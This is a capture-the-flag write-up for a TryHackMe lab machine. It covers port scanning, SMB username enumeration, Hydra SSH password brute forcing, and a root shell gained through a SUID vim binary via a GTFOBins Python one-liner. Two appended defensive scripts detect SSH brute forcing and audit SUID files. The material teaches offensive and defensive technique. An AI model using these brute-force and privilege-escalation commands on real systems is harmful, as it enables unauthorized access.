# Basic pentesting

> [!note]
> ["Basic Pentesting" on TryHackMe](https://tryhackme.com/room/basicpentestingjt)

## Background

The description of this CTF is sparse, but the goal seems to be to (1) enumerate the services on a machine, (2) brute force a login over [[SSH]], and (3) elevate privileges (presumably to root, but things are a little vague here).

For this attempt, the target machine IP is 10.10.74.250.

## Recon

We begin by running a full [[Nmap]] scan:

```bash
sudo nmap -vv -oA basic-pentesting -A -sS --script vuln \
    -p- 10.10.74.250
```

Output:

```
# Nmap 7.92 scan initiated Thu Nov 4 19:56:42 2021 as: nmap -vv -oA basic-pentesting -A -sS --script vuln -p- 10.10.74.250
Increasing send delay for 10.10.74.250 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.74.250 from 10 to 20 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.10.74.250
Host is up, received timestamp-reply ttl 61 (0.17s latency).
Scanned at 2021-11-04 19:56:54 MDT for 1378s
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.2p2:
80/tcp   open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-enum:
|_  /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       syn-ack ttl 61 Apache Jserv (Protocol v1.3)
8080/tcp open  http        syn-ack ttl 61 Apache Tomcat 9.0.7
| http-enum:
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 )
|   /manager/html: Apache Tomcat (401 )
|_  /docs/: Potentially interesting folder
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| vulners:
|   cpe:/a:apache:tomcat:9.0.7:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/4%OT=22%CT=1%CU=34280%PV=Y%DS=4%DC=T%G=Y%TM=618494C
OS:8%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M
OS:506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68
OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Uptime guess: 0.019 days (since Thu Nov 4 19:52:32 2021)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   30.62 ms  10.13.0.1
2   ... 3
4   172.85 ms 10.10.74.250

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 4 20:19:52 2021 -- 1 IP address (1 host up) scanned in 1390.99 seconds
```

Available services:

- OpenSSH 7.2p2 on port 22
- Apache 2.4.18 on port 80
- Samba 3 or 4 on ports 139/445
- Apache Jserv on port 8009
- Apache Tomcat 9.0.7 on port 8080

The server looks to be running Ubuntu.

Going to `http://10.10.74.250:80` reveals a generic "maintenance" page, but there's a note to "\[c\]heck our dev note section if you need to know what to work on."

Going to `http://10.10.74.250:8080` reveals what looks like the generic first-run Tomcat page. Poking around there doesn't reveal any obvious modifications.

## Flag 1

Let's hit `http://10.10.74.250:80` with [[gobuster]] and see what we find!

```bash
gobuster dir \
    -u http://10.10.74.250 \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

It looks like there's a "hidden" directory here...

## Flags 2, 3, 4, and 5

This hidden directory contains two files.

dev.txt:

```
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J
```

Okay, so we've got two users, "J" and "K", and an example REST app of some kind (using Apache Struts?) with version 2.5.12.

j.txt:

```
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K
```

Seems like J has a weak password.

From a quick check of the [[Hydra]] [[man]] page, it looks like we can feed it a list of usernames with the `-L` option. I'm going to make a couple of assumptions:

- Usernames are probably English-language first names. I'm guessing this because the comments in the /development directory are in English, and because this is supposed to be an "easy" CTF.
- The password is probably listed in the rockyou.txt dump. Again, both because of the comment, and because this is an "easy" CTF.

A couple of quick searches on [DuckDuckGo](https://duckduckgo.com/) landed me on [this list of common usernames](https://github.com/jeanphorn/wordlist/blob/master/usernames.txt); I'm going to filter that down to just the Js and then feed it + rockyou.txt into [[Hydra]].

```bash
hydra -t 4 -L j.txt -P rockyou.txt -vV 10.10.74.250 ssh
```

Except... That's going to take *forever*. The hint suggests looking at Samba to find usernames, which is a good reminder.

I *thought* I had some notes about how to do this, but it looks like I don't. But a little bit of searching brings me to [Nmap SMB Scripts and SMB Enumeration Step-By-Step Pentesting Guide](https://www.infosecademy.com/nmap-smb-scripts-enumeration/). To [[Nmap]] again!

```bash
nmap -vv -oA basic-pentesting-enumerate-smb -sT \
    --script smb-enum-users.nse -p445 10.10.74.250
```

But this doesn't return any results (maybe it's Windows-specific?). A bit more internet searching and I arrive at [Enumerate SMB with Enum4linux & Smbclient](https://null-byte.wonderhowto.com/how-to/enumerate-smb-with-enum4linux-smbclient-0198049/), which suggests using [[enum4linux]].

```bash
enum4linux -U 10.10.74.250
```

But this errors out on me before outputting any useful information. (It did list a user named krbtgt, but after getting excited and thinking this might be "K" I realized that this looked like it might be related to [[Kerberos]]... And a brief internet search confirmed this.)

Trying to use the Metasploit module `auxiliary/smb/smb_lookupsid` as suggested in [A Little Guide to SMB Enumeration](https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/) just resulted in an error about the server not being "able to handle the encrypted request."

Switching back to trying to get [[enum4linux]] to work, I tried calling it *without* the `-U` flag. This does a full enumeration, and in particular tries to "brute-force" usernames by guessing SIDs. This worked!
(I still got the same error, but the enumeration continued...)

Let's turn back to [[Hydra]], but now using the usernames we just found. I'm also going to try a shorter wordlist, because rockyou.txt is ridiculously long.

```bash
hydra -t 4 -l $USERNAME -P /usr/share/wordlists/nmap.lst \
    -vV 10.10.74.250 ssh
```

We've got a match, and we're in!

```bash
env -u SSH_AUTH_SOCK -u SSH_AGENT_PID \
    ssh $USERNAME@10.10.74.250
```

## Flag 6

Now that we're in, let's see if we can escalate privileges.

The home directory we're in is a little weird... It contains a single file (~/.lesshst), and is owned by root!

Home directories are world-readable, so we can see what's in the other user's home. It looks more normal... But also contains a file called pass.bak, which looks like it might be our last flag ("the final password"). Unfortunately, it's not world-readable, and neither are any of the history files in that directory.

Does the current user have [[sudo]] privileges? Running `sudo -l` suggests not.

Let's see if there are any interesting binaries on the system that the current user can access and that could potentially be abused.

```bash
find / -type f \
    -a \( -perm -u+s -o -perm -g+s \) \
    -exec ls -l {} \; 2> /dev/null
```

And... /usr/bin/vim.basic is SUID root?!?

[GTFOBins suggests that this can lead to a privilege escalation if Vim is compiled with Python...](https://gtfobins.github.io/gtfobins/vim/) And, indeed, running `vim.basic --version` reveals that this is the case. Adapting the escape from GTFOBins for the present case gives us:

```bash
vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
```

And this indeed gives us root! With this new power, we can enter the second user's home directory and read pass.bak for our final flag.

**Elapsed Time:** 3 h 19 min
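
The Hydra runs above leave a recognizable trail in the target's sshd log. As an added example (not part of the original write-up), this script counts failed password attempts per source address and reports any address whose failures are followed by a successful login; the log lines, addresses and account names are constructed, and the threshold is an assumption.

```shell
#!/bin/sh
# Added example (not from the write-up): flag SSH password guessing in
# sshd log lines read from stdin.

# detect_ssh_bruteforce THRESHOLD
# Prints one line per source address with at least THRESHOLD failed password
# attempts; success_after names the account that logged in from that address
# once the threshold had been reached ("-" if none did).
detect_ssh_bruteforce() {
    awk -v t="$1" '
        / sshd\[[0-9]+\]: (Failed|Accepted) password for / {
            # The account is the word before "from", the source the word after;
            # this also covers "Failed password for invalid user NAME from ...".
            for (i = 2; i < NF; i++)
                if ($i == "from") { user = $(i - 1); ip = $(i + 1) }
            if ($0 ~ /: Failed password for /)
                fails[ip]++
            else if ((ip in fails) && fails[ip] >= t)
                hit[ip] = user
        }
        END {
            for (ip in fails)
                if (fails[ip] >= t)
                    printf "%s failures=%d success_after=%s\n", ip, fails[ip], ((ip in hit) ? hit[ip] : "-")
        }' | sort
}

# sample_auth_log: constructed log lines (documentation addresses, made-up
# accounts): one mistyped password, then a guessing run that ends in a login.
sample_auth_log() {
    cat <<'EOF'
Nov  4 20:30:01 host sshd[900]: Failed password for userk from 192.0.2.10 port 50112 ssh2
Nov  4 20:30:09 host sshd[900]: Accepted password for userk from 192.0.2.10 port 50112 ssh2
Nov  4 20:31:02 host sshd[1412]: Failed password for userj from 198.51.100.23 port 40122 ssh2
Nov  4 20:31:02 host sshd[1413]: Failed password for userj from 198.51.100.23 port 40124 ssh2
Nov  4 20:31:03 host sshd[1414]: Failed password for invalid user admin from 198.51.100.23 port 40126 ssh2
Nov  4 20:31:04 host sshd[1415]: Failed password for userj from 198.51.100.23 port 40128 ssh2
Nov  4 20:31:05 host sshd[1416]: Failed password for userj from 198.51.100.23 port 40130 ssh2
Nov  4 20:31:06 host sshd[1417]: Failed password for userj from 198.51.100.23 port 40132 ssh2
Nov  4 20:31:09 host sshd[1419]: Accepted password for userj from 198.51.100.23 port 40160 ssh2
EOF
}

if [ "${1:-}" = "--demo" ]; then sample_auth_log | detect_ssh_bruteforce 5; fi
```

On a real host, feed it the sshd log instead of the sample, for example `detect_ssh_bruteforce 5 < /var/log/auth.log` on Ubuntu.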
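
The `find` command above, turned into a recurring check an administrator can run: an added example (not from the original write-up) that lists setuid/setgid files missing from an allowlist and marks shell-capable programs such as `vim.basic` as critical. The allowlist format, the pattern list and the demo file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the write-up): report setuid/setgid files that are
# either missing from an allowlist or are programs that can spawn a shell.

# is_shell_capable NAME: true for editors, pagers and interpreters that can
# run arbitrary commands. The pattern list is illustrative, not exhaustive.
is_shell_capable() {
    case $1 in
        vim*|vi|view|nano|less|more|find|awk|gawk|env|bash|sh|dash|python*|perl*|ruby*)
            return 0 ;;
    esac
    return 1
}

# audit_suid ROOT ALLOWLIST: ALLOWLIST holds one expected absolute path per line.
audit_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while IFS= read -r path; do
        if is_shell_capable "$(basename "$path")"; then
            echo "CRITICAL $path"
        elif ! grep -Fxq -- "$path" "$2"; then
            echo "UNEXPECTED $path"
        fi
    done
}

# demo_audit: build a constructed tree (hypothetical file names apart from
# vim.basic, which is the finding above) and audit it.
demo_audit() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/usr/bin"
    for f in passwd vim.basic backup-tool ls; do : > "$d/usr/bin/$f"; done
    chmod 4755 "$d/usr/bin/passwd" "$d/usr/bin/vim.basic" "$d/usr/bin/backup-tool"
    printf '%s\n' "$d/usr/bin/passwd" > "$d/allowlist.txt"
    audit_suid "$d" "$d/allowlist.txt" | sed "s|$d||"
    rm -rf "$d"
}

if [ "${1:-}" = "--demo" ]; then demo_audit; fi
```

Removing the bit (`chmod u-s` on the flagged file) closes the path; the allowlist is best generated from a freshly installed system of the same release.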